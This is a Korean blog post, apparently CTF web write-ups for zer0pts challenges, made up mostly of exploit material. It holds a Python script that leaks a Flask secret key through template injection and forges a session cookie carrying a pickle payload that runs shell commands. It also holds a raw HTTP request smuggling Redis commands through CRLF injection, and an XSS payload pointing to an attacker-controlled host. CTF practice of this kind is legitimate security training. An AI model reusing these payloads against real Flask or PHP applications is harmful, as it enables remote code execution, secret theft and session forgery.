NorePad

exploit.py

#-*- coding: utf-8 -*-

import sys

from hashlib import sha1

from flask.sessions import session_json_serializer

from itsdangerous import URLSafeTimedSerializer

import requests

import pickle

import base64

import __builtin__

import re


def getKey():

    url = "http://3.112.201.75:8001/gg"

    headers = {"Referer":"http://3.112.201.75:8001/{{config}}"}

    c = requests.get(url,headers=headers).text

    p = re.compile("b'.*?,")

    print "Secret_key =" +  p.findall(c)[0][:-1].replace("'","'")


def getFlag(key):

    if key == "":

        print "No Input Key"

        exit()


    secret_key = key # input

    s = URLSafeTimedSerializer(

        secret_key, salt='cookie-session',

        serializer=session_json_serializer,

        signer_kwargs={'key_derivation': 'hmac', 'digest_method': sha1}

    )


    class exploit(object):

        def __reduce__(self):

            p = "__import__('os').popen('cat flag').read()"

            return (__builtin__.eval, (p,))


    payload = base64.b64encode(pickle.dumps([{"date": "123", "text": "555", "title": exploit()}]))


    session_data = {"savedata":payload}

    session = s.dumps(session_data)

    print "[*] Encrypted Session is = " + session


    url = "http://3.112.201.75:8001/"

    headers = {"Cookie":"session="+session}

    c = requests.get(url,headers=headers).text

    p = re.compile("zer0pts.*}")

    print "[*]Flag = " + p.findall(c)[0]


session_key =  getKey()

session_key = b'\\\xe4\xed}w\xfd3\xdc\x1f\xd72\x07/C\xa9I'

getFlag(session_key)


Can You Guess It?


Payload = http://3.112.201.75:8003/index.php/config.php/%81?source=1


URL Scan


payload  


1) Flag Setting

POST / HTTP/1.1

Host: 18.179.178.246:8004

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 143


url=url=abcd%0d%0arename%20flag%201234567890aabbce%0d%0asetrange%201234567890aabbce%207%20'_'%20%0d%0asetrange%201234567890aabbce%2035%20'_'%20


2) Get Flag

http://18.179.178.246:8004/?p=1234567890aabbce



MusicBlog


Payload

POST /new_post.php HTTP/1.1

Host: 18.179.178.246:8005

Content-Length: 123

Cache-Control: max-age=0

Origin: http://18.179.178.246:8005

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://18.179.178.246:8005/new_post.php

Accept-Encoding: gzip, deflate

Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7

Cookie: PHPSESSID=5b54a2f98b67bde15fdfadf26f4c256d

Connection: close


title=bbsss&content=[["><a/udio href="http://my_ip" id="like">]]



'CTF > Writeup' 카테고리의 다른 글

Christmas CTF 2019 Write up  (4) 2019.12.30
ASIS CTF 2019 Final Web Write up  (0) 2019.11.18
CCE(사이버공격방어대회) 2019 Write up  (0) 2019.09.29
InCTF 2019 Web Write up  (0) 2019.09.23
CSAW CTF 2019 Web Write up  (0) 2019.09.16
블로그 이미지

JeonYoungSin

메모 기록용 공간

,